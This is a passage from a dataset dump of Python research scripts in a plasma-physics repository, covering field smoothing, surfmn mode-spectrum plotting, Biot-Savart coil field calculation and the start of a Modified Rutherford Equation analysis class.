fWeld)/self.weldPsi**2\n self.quadB = dfWeld - 2.0* self.quadA * self.weldPsi\n def quadEval(self, psi):\n return self.quadA * psi**2 + self.quadB * psi + self.quadC\n def smooth (self, field):\n ''' This function applies a bump function fit to smooth the field'''\n splineField = splrep(field[:,0],field[:,1],k=3)\n fieldAtWeld = splev(self.weldPsi,splineField)\n dFieldAtWeld = splev(self.weldPsi,splineField,der=1)\n self.quadFit(fieldAtWeld,dFieldAtWeld)\n tempField = np.zeros(field.shape)\n for ix, ipsi in enumerate(field[:,0]):\n tempField[ix,0] = ipsi\n if (ipsi < self.weldPsi):\n tempField[ix,1] = self.quadEval(ipsi)\n else:\n tempField[ix,1] = field[ix,1]\n\n newSplineField = splrep(tempField[:,0],tempField[:,1],k=3)\n for ix, ipsi in enumerate(tempField[:,0]):\n tempField[ix,2]= splev(ipsi,newSplineField,der=1)\n# plot fields\n x2 = np.linspace(0, 1, 200)\n y2 = splev(x2, splineField)\n y3 = splev(x2, newSplineField)\n plt.plot(x2, y2, x2, y3)\n plt.show()\n \n return tempField\n\n\nfilePath = homeDir + \"/SCRATCH/174446_debug2/eq1/\"\npFileName = \"p174446.3390.0_new_rot_fits\"\npFileWrite = pFileName + \".smooth\"\n\n\n# Set up field \nomgeb = modField(\"omgeb(kRad/s)\",21.6,0.0,0.1,1)\nkpol = modField(\"kpol(km/s/T)\",-7.5,0.0,0.1,1)\n\nfixList = [omgeb,kpol]\n\nprint(filePath + pFileName)\nthisFile = open(filePath+pFileName,\"r\")\nwriteFile = open(filePath+pFileWrite, \"w\")\n\nprint (\"Reading file \" + filePath+pFileName )\nwhile True:\n thisLine = thisFile.readline()\n if len(thisLine)==1:\n break\n thisWord = thisLine.split()\n if len(thisWord)>4: break\n writeFile.write(thisLine)\n print (\"Reading Field \" + thisWord[2])\n thisField = readField(thisFile,int(thisWord[0]))\n for iFix in fixList:\n if iFix.name == thisWord[2]:\n print(iFix.name)\n thisField=iFix.smooth(thisField)\n print (\"Writing Field \" + thisWord[2])\n writeField(writeFile,thisField)\n\n\nthisFile.close()\nwriteFile.close()\n" }, { "alpha_fraction": 0.6475300192832947, "alphanum_fraction": 0.6702269911766052, "avg_line_length": 25.75, "blob_id": "da6947e34cfa1079a4d74461532f0957a1dbdd30", "content_id": "cfff5910703ba478ba2d53bbd1c6f95004ef83bf", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1498, "license_type": "no_license", 
"max_line_length": 80, "num_lines": 56, "path": "/surfmn/surfmn_analysis.py", "repo_name": "echowell/nimrodscripts", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python3\n#\n#\n# Do neat stuff\n\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport os\nimport h5py\nimport scipy.interpolate as interp\nimport surfmnstep \nimport matplotlib.colors as mcolors\n\ndef get_m_index(m, m_max):\n return m+m_max\n\ndef surfmn_plot(mr,fmn,ffac,levels,vmax,m_range,q,title,cbar_ticks,reset=False):\n if reset:\n levels=301\n vmax=np.amax(fmn)*ffac\n levels=np.linspace(0,vmax,301)\n cbar_ticks = np.linspace(0,vmax,11)\n\n fig = plt.figure(figsize=(6,5))\n ax=fig.add_subplot(111)\n plt.set_cmap('nipy_spectral')\n conf=plt.contourf(mr[0,:,:],mr[1,:,:],fmn*ffac,levels=levels,vmax=vmax)\n plt.plot(m_range,q,c='w')\n plt.title(title,fontsize=16)\n plt.ylabel(r'<r>',fontsize=16)\n plt.xlabel('m',fontsize=16)\n cbar=fig.colorbar(conf,ticks=cbar_ticks)\n plt.show()\n\ndef radial_plot(mr,fmn,ffac,mlist,m_max,qlist,qlabel,title,ylabel):\n colorlist = list(mcolors.TABLEAU_COLORS)\n fig = plt.figure(figsize=(6,5))\n ax= fig.add_subplot(111)\n for im,this_m in enumerate(mlist):\n this_i = get_m_index(this_m,m_max)\n plt_lbl = \"m = \" + str(this_m)\n tc=colorlist[im]\n ax.plot(mr[1,:,1],fmn[:,this_i]*ffac, color=tc, label=plt_lbl)\n for iq,this_q in enumerate(qlist):\n this_rho = psi_of_q(this_q) \n this_lbl = qlabel[iq]\n tc=colorlist[iq]\n ax.axvline(this_rho,ls=':',color=tc, label=this_lbl)\n\n ax.axhline(0,ls='-',c='k')\n ax.legend(loc=0)\n plt.title(title)\n plt.xlabel(r'<r>')\n plt.ylabel(ylabel)\n plt.tight_layout()\n plt.show()\n" }, { "alpha_fraction": 0.5573705434799194, "alphanum_fraction": 0.6571713089942932, "avg_line_length": 30.381250381469727, "blob_id": "44b104ee7287065958dc8ad3ffa58782b135853e", "content_id": "b4c75bf8fc4cbc00804fc088f154602a256174ad", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 5020, "license_type": "no_license", "max_line_length": 99, "num_lines": 160, "path": "/plotingScripts/surfmnPlts.py", "repo_name": "echowell/nimrodscripts", "src_encoding": "UTF-8", "text": "#!/usr/local/bin/python3\n\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport os\nimport h5py\nimport scipy.interpolate as interp\n\n\ndef get_m_index(m, m_max):\n return m+m_max\n\nplot_type = \"nonlinear2\"\n\n#vacuum,linear, nonlinear\n\n\nrun_dir = \"19092601_l5\"\n#run_dir = \"1908163\"\ndump_num = \"40000\"\nhomeDir = os.environ['HOME']\nscratchDir = homeDir + '/SCRATCH'\nfileName = scratchDir+'/174446_novac_fl/eq26/1908013/08000/surfmn.08000.h5'\nfileName = scratchDir+'/174446_novac_debug/vac_eq28_rmp/surfmn.00100.h5'\nfileName = \"/home/research/ehowell/SCRATCH/174446_novac_new_eq/surfmn_optimize/vac/surfmn.00100.h5\"\nfileName = \"/home/research/ehowell/SCRATCH/174446_novac_new_eq/surfmn_optimize/vac/surfmn.00100.h5\"\nfileName = scratchDir+'/174446_novac_fl/eq26/'+run_dir+'/'+ dump_num +'/surfmn.'+ dump_num + '.h5'\n\n#run_dir = \"case_15_vac\"\n#dump_num = \"00100\"\n#fileName = scratchDir+'/174446_novac_new_eq/surfmn_scan/'+run_dir+'/surfmn.'+ dump_num + '.h5'\n\n#fileName = scratchDir+'/166439/03300_vac_eq/complexconj_rmp_vac5_fpsep2/surfmn.00005.h5'\n#fileName = scratchDir+'/166439/03300_vac_eq/complexconj_rmp_vac5_fpsep2/surfmn.00005_rr.h5'\n#fileName = scratchDir+'/166439//03300_vac_eq/complexconj_rmp_vac/surfmn.00005.h5'\n\nif (plot_type==\"vacuum\"):\n fileName = scratchDir + 
\"/166439/03300_2_equilbria/19091201_vac_lphi5_fp/surfmn.00100.h5\"\n n1_title = r' Vacuum n=1 $|B_\\psi|$ [A.U.]'\n n3_title = r' Vacuum n=3 $|B_\\psi|$ [A.U.]'\nelif (plot_type==\"linear\"):\n fileName = scratchDir + \"/166439/03300_2_fl/19091702/lphi5_rmp_cfl_b/200000/surfmn.200000.h5\"\n n1_title = r' Linear n=1 $|B_\\psi|$ [A.U.]'\n n3_title = r' Linear n=3 $|B_\\psi|$ [A.U.]'\nelif (plot_type==\"nonlinear\"):\n fileName = scratchDir + \"/166439/03300_2_fl//19091702/lphi5_nolinear_fresh/22000/surfmn.22000.h5\"\n n1_title = r' Nonlinear n=1 $|B_\\psi|$ [A.U.]'\n n3_title = r' Nonlinear n=3 $|B_\\psi|$ [A.U.]'\nelif (plot_type==\"nonlinear2\"):\n fileName = scratchDir + \"/166439/03300_2_fl//19091702/lphi5_nolinear_fresh/10000/surfmn.10000.h5\"\n n1_title = r' Nonlinear n=1 $|B_\\psi|$ [A.U.]'\n n3_title = r' Nonlinear n=3 $|B_\\psi|$ [A.U.]'\n\n#n1_scale\nplt.ylabel(r'$|B_\\psi|$ [A.U.]')\nsfac=1e4\nvmax_n1 = 4.0\nvmax_n3 = 4.0\nlevel1=np.linspace(0,vmax_n1,301)\nlevel3=np.linspace(0,vmax_n3,301)\n\nn1_cbar_ticks = np.linspace(0,vmax_n1,11)\nn3_cbar_ticks = np.linspace(0,vmax_n3,11)\nprint (n1_cbar_ticks)\n\nm_plot_list = [-6,-5,-4,-3,-2,-1, 0]\nq1_plot_list = [-2,-3,-4]\nq3_plot_list = [-1.67,-2.00,-2.33]\n\nprofNames = ['Vprime','q']\nwith h5py.File(fileName,'r') as fc:\n# for aname, avalue in fc.attrs.items():\n# print(aname,avalue)\n mrGrid = fc['surfmnGrid'][:]\n bmn = fc['Bmn001'][:]\n bmn3 = fc['Bmn003'][:]\n rho = fc['rho'][:]\n profs = fc['prof'][:]\n# print(fc.keys())\n \npsi_of_q = interp.interp1d(profs[1,:],rho)\nm1_range = np.linspace(-1.043,-5.9)\nq_of_m1 = psi_of_q(m1_range)\nm3_range = np.linspace(-3.129,-15)\nq_of_m3 = psi_of_q(m3_range/3.00)\n\nm_max = int((bmn.shape[1]-1)/2)\n#print(m_max)\n\n#print(mrGrid.shape[2])\n#print(bmn.shape)\nfig = plt.figure()\nax=fig.add_subplot(111)\nplt.set_cmap('nipy_spectral')\nconf=plt.contourf(mrGrid[0,:,:],mrGrid[1,:,:],bmn*sfac,levels=level1,vmax=vmax_n1)\nplt.plot(m1_range,q_of_m1,c='w')\nplt.title(n1_title,fontsize=16)\nplt.ylabel(r'<r>',fontsize=16)\nplt.xlabel('m',fontsize=16)\ncbar=fig.colorbar(conf,ticks=n1_cbar_ticks)\nplt.show()\n#plt.colorbar(ticks=n1_cbar_ticks)\n\nfig = plt.figure()\nax=fig.add_subplot(111)\nplt.set_cmap('nipy_spectral')\nconf=plt.contourf(mrGrid[0,:,:],mrGrid[1,:,:],bmn3*sfac,levels=level3,vmax=vmax_n3)\nplt.plot(m3_range,q_of_m3,c='w')\nplt.title(n3_title,fontsize=16)\nplt.ylabel(r'<r>',fontsize=16)\nplt.xlabel('m',fontsize=16)\ncbar=fig.colorbar(conf,ticks=n3_cbar_ticks)\nplt.show()\n\nfig = plt.figure(figsize=(6,6))\nax= fig.add_subplot(111)\nfor this_m in m_plot_list:\n this_i = get_m_index(this_m,m_max)\n plt_lbl = \"m = \" + str(this_m)\n ax.plot(mrGrid[1,:,1],bmn[:,this_i], label=plt_lbl)\nfor this_q in q1_plot_list:\n this_rho = psi_of_q(this_q) \n this_lbl = \"q = \" + str(this_q)\n ax.axvline(this_rho,ls=':', label=this_lbl)\n\n#ax.axvline(0.607025,ls=':',c='b', label=\"q=2\")\n#ax.axvline(0.75138,ls=':',c='g', label=\"q=3\")\n#ax.axvline(0.849892,ls=':',c='c', label=\"q=4\")\n\nax.axhline(0,ls='-',c='k')\nax.legend(loc=0)\nplt.title(r'Vacuum n=1 response')\nplt.xlabel(r'<r>')\nplt.ylabel(r'$|B_\\psi|$ [A.U.]')\nplt.tight_layout()\nplt.show()\n\n\nfig = plt.figure(figsize=(6,6))\nax= fig.add_subplot(111)\nfor this_m in m_plot_list:\n this_i = get_m_index(this_m,m_max)\n plt_lbl = \"m = \" + str(this_m)\n ax.plot(mrGrid[1,:,1],bmn3[:,this_i], label=plt_lbl)\nfor this_q in q3_plot_list:\n this_rho = psi_of_q(this_q) \n this_lbl = \"q = \" + str(this_q)\n ax.axvline(this_rho,ls=':', 
label=this_lbl)\n\n#ax.axvline(0.607025,ls=':',c='b', label=\"q=2\")\n#ax.axvline(0.75138,ls=':',c='g', label=\"q=3\")\n#ax.axvline(0.849892,ls=':',c='c', label=\"q=4\")\n\nax.axhline(0,ls='-',c='k')\nax.legend(loc=0)\nplt.title(r'Vacuum n=3 response')\nplt.xlabel(r'<r>')\nplt.ylabel(r'$|B_\\psi|$ [A.U.]')\nplt.tight_layout()\nplt.show()" }, { "alpha_fraction": 0.5741095542907715, "alphanum_fraction": 0.6316864490509033, "avg_line_length": 33.205238342285156, "blob_id": "af48dcc3b9343933f9b48749cb7b983fe0b72ecd", "content_id": "98e9674bd9ccb766b7e5639e2f109663d4fc45d8", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 7833, "license_type": "no_license", "max_line_length": 117, "num_lines": 229, "path": "/surfmnNim/surfmnPlot.py", "repo_name": "echowell/nimrodscripts", "src_encoding": "UTF-8", "text": "#!/usr/bin/python\n\nimport numpy as np\nfrom matplotlib import ticker\nimport matplotlib.pyplot as plt\nimport matplotlib.cm as cm\nfrom surfmn import files,rho1,bnm,irho12,irho13,irho14,irho15,irho16,rho,fgfile,irho2,irho3,irho4,q1,irho110,m,mrange\n\nbnmflip=bnm[:,::-1]\n\nplotsurf=1\nplotsurf2wall=0\nplotmag=1\nplotmag2wall=0\nbylim=9e-4\n\nsavepath = \"/home/research/ehowell/SCRATCH/166439/03300_q104_flowtesting/n1_run1/orginal_exb/300000/\"\n\nbasename=\"vac1\"\nnfour=1\n\n\nxyfile=0\n\nxyfilestr=files[xyfile][8:10]\n\n\n\nvacn2=bnmflip[0,8,irho2]\nvacn3=bnmflip[0,7,irho3]\nvacn4=bnmflip[0,6,irho4]\n\nvacn12=bnmflip[0,8,irho12]\nvacn13=bnmflip[0,7,irho13]\nvacn14=bnmflip[0,6,irho14]\nvacn15=bnmflip[0,5,irho15]\nvacn16=bnmflip[0,4,irho16]\n\n#plotting routines\n\nclines=301 #levels of filled contours\nibmax=len(rho[fgfile])+1\n\nif plotmag2wall==1:\n\n fig,ax=plt.subplots(figsize=(6,6))\n ax.plot(rho1,bnmflip[xyfile,mrange+1].real,color='m',label='m=-1',lw=3)\n ax.plot(rho1,bnmflip[xyfile,mrange+2].real,color='r',label='m=-2',lw=3)\n ax.plot(rho1,bnmflip[xyfile,mrange+3].real,color='b',label='m=-3',lw=3)\n ax.plot(rho1,bnmflip[xyfile,mrange+4].real,color='g',label='m=-4',lw=3)\n ax.plot(rho1,bnmflip[xyfile,mrange+5].real,color='y',label='m=-5',lw=3)\n ax.plot(rho1,bnmflip[xyfile,mrange+6].real,color='lime',label='m=-6',lw=3)\n ax.axvline(x=rho1[irho12],lw=3,ls='dotted',c='r',label=r'$q=-2$')\n ax.axvline(x=rho1[irho13],lw=3,ls='dotted',c='b',label=r'$q=-3$')\n ax.axvline(x=rho1[irho14],lw=3,ls='dotted',c='g',label=r'$q=-4$')\n ax.axvline(x=rho1[irho15],lw=3,ls='dotted',c='y',label=r'$q=-5$')\n ax.axvline(x=rho1[irho16],lw=3,ls='dotted',c='lime',label=r'$q=-5$')\n\n ax.plot(rho1[irho12],vacn12,marker=7,color='r',markersize=16) \n ax.plot(rho1[irho13],vacn13,marker=7,color='b',markersize=16) \n ax.plot(rho1[irho14],vacn14,marker=7,color='g',markersize=16) \n ax.plot(rho1[irho15],vacn15,marker=7,color='y',markersize=16) \n ax.plot(rho1[irho16],vacn16,marker=7,color='lime',markersize=16)\n \n ax.legend(loc=1,ncol=2,fontsize=14)\n \n ax.yaxis.major.formatter._useMathText = True\n ax.ticklabel_format(axis='y', style='sci', scilimits=(-2,-2))\n ax.yaxis.offsetText.set_fontsize(20)\n ax.locator_params(axis='x',nbins=5)\n\n# ax.set_xlim([.1,1]) \n\n# ax.set_ylim([0,4e-3]) \n \n plt.setp(ax.get_xticklabels(), fontsize=22)\n plt.setp(ax.get_yticklabels(), fontsize=22)\n \n ax.set_xlabel(r'$<r>_N}$',fontsize=24)\n ax.set_ylabel(r'$B_{r(m,n)}\\,{\\rm (T)}$',fontsize=24)\n \n plt.savefig('Bm2wall'+xyfilestr+'.png',bbox_inches='tight')\n\n\nif plotmag==1:\n\n fig,ax=plt.subplots(figsize=(6,6))\n 
ax.plot(rho[fgfile],bnmflip[xyfile,mrange+1,1:ibmax].real,color='m',label='m=-1',lw=3)\n ax.plot(rho[fgfile],bnmflip[xyfile,mrange+2,1:ibmax].real,color='r',label='m=-2',lw=3)\n ax.plot(rho[fgfile],bnmflip[xyfile,mrange+3,1:ibmax].real,color='b',label='m=-3',lw=3)\n# ax.plot(rho[fgfile],bnmflip[xyfile,mrange+4,1:ibmax].real,color='g',label='m=-4',lw=3)\n ax.axvline(x=rho[fgfile][irho2],lw=3,ls='dotted',c='r',label=r'$q=2$')\n ax.axvline(x=rho[fgfile][irho3],lw=3,ls='dotted',c='b',label=r'$q=3$')\n # ax.axvline(x=rho[fgfile][irho4],lw=3,ls='dotted',c='g',label=r'$q=4$')\n\n# ax.plot(rho[fgfile][irho2],vacn2,marker=7,color='r',markersize=16) \n# ax.plot(rho[fgfile][irho3],vacn3,marker=7,color='b',markersize=16) \n# ax.plot(rho[fgfile][irho4],vacn4,marker=7,color='g',markersize=16) \n \n ax.legend(loc=2,ncol=2,fontsize=14)\n \n ax.yaxis.major.formatter._useMathText = True\n ax.ticklabel_format(axis='y', style='sci', scilimits=(-2,-2))\n ax.yaxis.offsetText.set_fontsize(20)\n ax.locator_params(axis='x',nbins=5)\n\n# ax.set_xlim([.1,1]) \n\n ax.set_ylim([0,bylim]) \n \n plt.setp(ax.get_xticklabels(), fontsize=22)\n plt.setp(ax.get_yticklabels(), fontsize=22)\n \n ax.set_xlabel(r'$\\rho_N$',fontsize=24)\n ax.set_ylabel(r'$B_{r(m,n)}\\,{\\rm (T)}$',fontsize=24)\n \n# plt.savefig('Bm'+xyfilestr+'.png',bbox_inches='tight')\n \n plt.savefig(savepath + basename + \"Bm.png\",bbox_inches='tight')\nif plotsurf2wall==1:\n bmmax=np.amax(bnmflip[xyfile,:,1:])\n bmmin=0\n\n# bmmax=np.amax(bm2) \n# bmmin=np.amin(bm2) \n \n# if abs(bmmax)>abs(bmmin):\n# bmmin=-bmmax\n# else:\n# bmmax=-bmmin\n \n# bmmax=0.002792068 \n \n nlev=100\n levels=np.arange(bmmin,bmmax,(bmmax-bmmin)/nlev)\n \n fig,ax=plt.subplots(figsize=(10,6))\n \n CS = ax.contourf(m,rho1[1:],np.rot90(bnmflip[xyfile,:,1:],k=-1),levels,cmap=cm.nipy_spectral,levels=100)\n# CS = ax.contourf(m,rho[fgfile],bm2,levels,cmap=cm.seismic)\n \n plt.setp(ax.get_xticklabels(), fontsize=22)\n plt.setp(ax.get_yticklabels(), fontsize=22)\n \n cbar=fig.colorbar(CS)\n tick_locator = ticker.MaxNLocator(nbins=5)\n cbar.locator = tick_locator\n cbar.ax.tick_params(labelsize=22)\n cbar.ax.yaxis.set_offset_position('left')\n cbar.ax.yaxis.offsetText.set_fontsize(20)\n cbar.formatter.set_powerlimits((0,0))\n cbar.update_ticks()\n cbar.set_label(r'$B_{r(m,n)}\\,{\\rm (T)}$',fontsize=24)\n ax.locator_params(axis='y',nbins=5)\n \n ax.plot(q1[1:irho110],rho1[1:irho110],c='white',lw=5,ls='dashed',label=r'$m=qn$')\n \n ax.axhline(y=rho1[irho12],lw=3,ls='dotted',c='r',label=r'$q=-2$')\n ax.axhline(y=rho1[irho13],lw=3,ls='dotted',c='b',label=r'$q=-3$')\n# ax.axhline(y=rho1[irho14],lw=3,ls='dotted',c='g',label=r'$q=-4$')\n# ax.axhline(y=rho1[irho15],lw=3,ls='dotted',c='y',label=r'$q=-5$')\n# ax.axhline(y=rho1[irho16],lw=3,ls='dotted',c='lime',label=r'$q=-6$')\n \n ax.legend(loc=4,fontsize=18,framealpha=.75)\n \n ax.set_ylabel(r'$<r>_N$',fontsize=24)\n ax.set_xlabel(r'$m$',fontsize=24)\n ax.set_xlim([-mrange,mrange])\n \n ax.set_ylim([.1,1.45]) \n \n #plt.savefig('surfmn_comp_15000.png',bbox_inches='tight')\n plt.savefig('surfmn2wall'+xyfilestr+'.png',bbox_inches='tight')\n\nif plotsurf==1:\n bmmax=np.amax(bnmflip[xyfile,:,1:])\n bmmax=bylim\n bmmin=0\n\n# bmmax=np.amax(bm2) \n# bmmin=np.amin(bm2) \n \n# if abs(bmmax)>abs(bmmin):\n# bmmin=-bmmax\n# else:\n# bmmax=-bmmin\n \n# bmmax=0.00278744622 \n \n nlev=100\n levels=np.arange(bmmin,bmmax,(bmmax-bmmin)/nlev)\n \n fig,ax=plt.subplots(figsize=(10,6))\n \n CS = 
ax.contourf(m,rho[fgfile],np.rot90(bnmflip[xyfile,:,1:ibmax],k=-1),levels,cmap=cm.nipy_spectral)\n# CS = ax.contourf(m,rho[fgfile],bm2,levels,cmap=cm.seismic)\n \n plt.setp(ax.get_xticklabels(), fontsize=22)\n plt.setp(ax.get_yticklabels(), fontsize=22)\n \n cbar=fig.colorbar(CS)\n tick_locator = ticker.MaxNLocator(nbins=5)\n cbar.locator = tick_locator\n cbar.ax.tick_params(labelsize=22)\n cbar.ax.yaxis.set_offset_position('left')\n cbar.ax.yaxis.offsetText.set_fontsize(20)\n cbar.formatter.set_powerlimits((0,0))\n cbar.update_ticks()\n cbar.set_label(r'$B_{r(m,n)}\\,{\\rm (T)}$',fontsize=24)\n ax.locator_params(axis='y',nbins=5)\n \n ax.plot(nfour*q1[:rho[fgfile].size],rho[fgfile],c='white',lw=5,ls='dashed',label=r'$m=qn$')\n \n ax.axhline(y=rho[fgfile][irho2],lw=3,ls='dotted',c='r',label=r'$q=-2$')\n ax.axhline(y=rho[fgfile][irho3],lw=3,ls='dotted',c='b',label=r'$q=-3$')\n #ax.axhline(y=rho[fgfile][irho4],lw=3,ls='dotted',c='g',label=r'$q=-4$')\n \n ax.legend(loc=4,fontsize=18,framealpha=.75)\n \n ax.set_ylabel(r'$\\rho_N$',fontsize=24)\n ax.set_xlabel(r'$m$',fontsize=24)\n ax.set_xlim([-mrange,mrange])\n ax.set_ylim([.1,.99]) \n \n #plt.savefig('surfmn_comp_15000.png',bbox_inches='tight')\n #plt.savefig('surfmn'+xyfilestr+'.png',bbox_inches='tight')\n plt.savefig(savepath + basename + \"surfmn.png\",bbox_inches='tight')\n\nplt.show()\n" }, { "alpha_fraction": 0.5662786364555359, "alphanum_fraction": 0.6064589023590088, "avg_line_length": 32.929935455322266, "blob_id": "da460cdb76b6dd9f39dcea74c29270166533000a", "content_id": "b8e94965a9f58e1e54b6f60a4bf558e57c8afab0", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 5326, "license_type": "no_license", "max_line_length": 97, "num_lines": 157, "path": "/biotSavart/biotSavartFunction.py", "repo_name": "echowell/nimrodscripts", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python3\n#\n# Input files:\n# Ouput file:\n\n\nimport os\nimport numpy as np\nimport sys\nimport coilClass as cc\nimport integrateBS as bs\nimport h5py\nfrom scipy.interpolate import interp1d\nimport scipy.optimize as opt\n\nclass coil_opt:\n rmag_axis=1.7682\n zmag_axis=0.0\n coil_r = 0.6\n distance_coil = 1.2\n delta_theta=0.20\n delta_tilt=.15\n coil_theta = [0, delta_theta, .5, 1-delta_theta]\n coil_tilt = [0.25, .5+delta_tilt, .75, 1-delta_tilt]\n phiPlanes = 4 \n segmentsPerCoil = 50\n baseCurrent = 1.0\n nPert = 1\n npCoil = len(coil_theta)\n nodeXYZ = np.zeros(0)\n coilBRZPhi = np.zeros(0)\n coilList = []\n filePath = \"\"\n baseFileName = \"brmpn\"\n fileExt = \".dat\"\n\n def __init__(self,filePath):\n self.filePath =filePath\n rzfile = filePath + 'nimrod_bdry_rz.txt'\n########### begin code #########\n nodeRZ = np.loadtxt(rzfile,comments='%',delimiter=',', skiprows=1)\n self.nodeXYZ = np.zeros([3,nodeRZ.shape[0],self.phiPlanes])\n self.coilBRZPhi = np.zeros([3,nodeRZ.shape[0],self.phiPlanes,self.npCoil])\n for iPhi in range(self.phiPlanes):\n sinPhi = np.sin(iPhi*2.0*np.pi/self.phiPlanes)\n cosPhi = np.cos(iPhi*2.0*np.pi/self.phiPlanes)\n self.nodeXYZ[0,:,iPhi]=nodeRZ[:,0]*cosPhi\n self.nodeXYZ[1,:,iPhi]=nodeRZ[:,0]*sinPhi\n self.nodeXYZ[2,:,iPhi]=nodeRZ[:,1]\n\n for ipcoil in range(self.npCoil):\n self.coilList.append([])\n\n #convert node locations to xyz coordinates at multiple phi planes\n\n for ii in range(6):\n phi = np.pi * ii/3.0\n thisCurrent = self.baseCurrent * np.cos(phi*self.nPert)\n theta = self.coil_theta[ipcoil] * 2.0 * np.pi\n \n r0 = self.rmag_axis + self.distance_coil * 
np.cos(theta)\n z0 = self.zmag_axis + self.distance_coil * np.sin(theta)\n x0 = r0 * np.cos(phi)\n y0 = r0 * np.sin(phi)\n tx = 0.0 \n ty = self.coil_tilt[ipcoil] * 2.0 * np.pi\n tz = phi\n\n thisCoil = cc.coil(thisCurrent,self.segmentsPerCoil)\n thisCoil.planarCoil(x0,y0,z0,self.coil_r,tx,ty,tz)\n self.coilList[ipcoil].append(thisCoil)\n\n for iNode in range(self.nodeXYZ.shape[1]):\n print(\"Calculating node: \" + str(iNode))\n for iPhi in range(self.nodeXYZ.shape[2]):\n print(\"Calculating plane: \" + str(iPhi))\n sys.stdout.flush()\n bXYZ=np.zeros(3)\n for ipcoil in range(self.npCoil):\n for iCoil in self.coilList[ipcoil]:\n bXYZ[:]+=bs.intCoil(iCoil,self.nodeXYZ[:,iNode,iPhi])\n phi = 2.0*np.pi*iPhi/self.phiPlanes\n ### transform to bRZPhi\n # bRZPhi accounts for the negative in Bphi due to rzphi coordinates\n self.coilBRZPhi[0,iNode,iPhi,ipcoil] = bXYZ[0]*np.cos(phi)+bXYZ[1]*np.sin(phi)\n self.coilBRZPhi[1,iNode,iPhi,ipcoil] = bXYZ[2]\n self.coilBRZPhi[2,iNode,iPhi,ipcoil] = bXYZ[0]*np.sin(phi)-bXYZ[1]*np.cos(phi)\n\n\n\n def coil_calc(self,coil_currents):\n bRZPhi=np.zeros([self.coilBRZPhi.shape[0],self.coilBRZPhi.shape[1],self.coilBRZPhi.shape[2]])\n bRPhase = np.zeros(1,dtype=np.complex_)\n bZPhase = np.zeros(1,dtype=np.complex_)\n bPhiPhase = np.zeros(1,dtype=np.complex_)\n for ipcoil, icur in enumerate(coil_currents):\n bRZPhi[:,:,:] += self.coilBRZPhi[:,:,:,ipcoil]*icur\n bRPhase=np.fft.fft(bRZPhi[0,:,:],axis=1)/(float(self.phiPlanes))\n bZPhase=np.fft.fft(bRZPhi[1,:,:],axis=1)/(float(self.phiPlanes))\n bPhiPhase=np.fft.fft(bRZPhi[2,:,:],axis=1)/(float(self.phiPlanes))\n\n### write brmp files\n if (self.phiPlanes % 2 == 0): #even\n maxnphi = int(self.phiPlanes/2)\n else: #odd\n maxnphi = int((self.phiPlanes+1)/2)\n for ii in range (maxnphi +1):\n if ii==maxnphi:\n fac=0.5\n else:\n fac=1.0\n tempFileName = self.filePath + self.baseFileName +\"{0:0=2d}\".format(ii) + self.fileExt\n thisFile = open(tempFileName,'w')\n for jj in range(bRPhase.shape[0]):\n thisLine ='{: 16.16e}'.format(fac*bRPhase[jj,ii].real) + \", \" \n thisLine+='{: 16.16e}'.format(fac*bRPhase[jj,ii].imag) + \", \"\n thisLine+='{: 16.16e}'.format(fac*bZPhase[jj,ii].real) + \", \" \n thisLine+='{: 16.16e}'.format(fac*bZPhase[jj,ii].imag) + \", \"\n thisLine+='{: 16.16e}'.format(fac*bPhiPhase[jj,ii].real) + \", \" \n thisLine+='{: 16.16e}'.format(fac*bPhiPhase[jj,ii].imag) + \"\\n\"\n thisFile.write(thisLine)\n thisFile.close()\n\ndef surfmn_eval(fileName):\n profNames = ['Vprime','q']\n with h5py.File(fileName,'r') as fc:\n for aname, avalue in fc.attrs.items():\n print(aname,avalue)\n mrGrid = fc['surfmnGrid'][:]\n bmn = fc['Bmn001'][:]\n rho = fc['rho'][:]\n profs = fc['prof'][:]\n print(fc.keys())\n \n#prof 1 is q\n fq = interp1d(profs[1,:],rho)\n rho_2 = fq(-2.)\n rho_3 = fq(-3)\n rho_4 = fq(-4)\n rho_5 = fq(-4)\n\n# print(rho_2,rho_3,rho_4)\n bmn1=interp1d(mrGrid[1,:,1],bmn[:,9])\n bmn2=interp1d(mrGrid[1,:,1],bmn[:,8])\n bmn3=interp1d(mrGrid[1,:,1],bmn[:,7])\n bmn4=interp1d(mrGrid[1,:,1],bmn[:,6])\n bmn5=interp1d(mrGrid[1,:,1],bmn[:,5])\n bres1=bmn1(rho_2) #evaluamte m=1 at rho=2 surface\n bres2=bmn2(rho_2)\n bres3=bmn3(rho_3) \n bres4=bmn4(rho_4)\n bres5=bmn5(rho_5)\n\n# print(bres1,bres2,bres3,bres4)\n small2=(1.0e-10**2)\n value=(bres1**2 + bres3**2 + bres4**2 + bres5**2)/(bres2**2+small2)\n return value" }, { "alpha_fraction": 0.49308452010154724, "alphanum_fraction": 0.5135382413864136, "avg_line_length": 32.782447814941406, "blob_id": "6200428f255145e426972dc50c218a7005047a92", "content_id": 
"e3d3a50c4c4771b8684a8bf16df02af7fdf35316", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 27330, "license_type": "no_license", "max_line_length": 148, "num_lines": 809, "path": "/mre_analysis/mre_step.py", "repo_name": "echowell/nimrodscripts", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python3\n\"\"\"Modified Rutherford Equation Analysis Script\n\nThis script performs a Modified Rutherford Equation analysis using\nthe supplied nimrod dumpfile.\n\"\"\"\n\n\nimport eval_nimrod as eval\nimport fsa\nimport plot_nimrod as pn\nimport matplotlib.pyplot as plt\nimport matplotlib.colors as mcolors\nimport h5py\nimport numpy as np\nimport pickle\nimport nim_timer as timer\nfrom scipy.interpolate import interp1d\n\n\nclass MreStep:\n \"\"\"\n A class used to represent a nimrod time step for MRE analysis\n\n ...\n\n Attributes\n ----------\n _dumpfile : str\n Nimrod dumpfile name\n _nimrodin : str\n Nimrod input file name (nimrod.in)\n _time : float\n Time of this time slice (seconds)\n _step : int\n Step number of this time slice\n _eval : EvalNimrod\n Instance of eval nimrod class\n Methods\n -------\n dump(self, file)\n Pickles data to file\n load(self, file)\n Reads pickled data from file\n read_dumptime(self)\n Read time and step 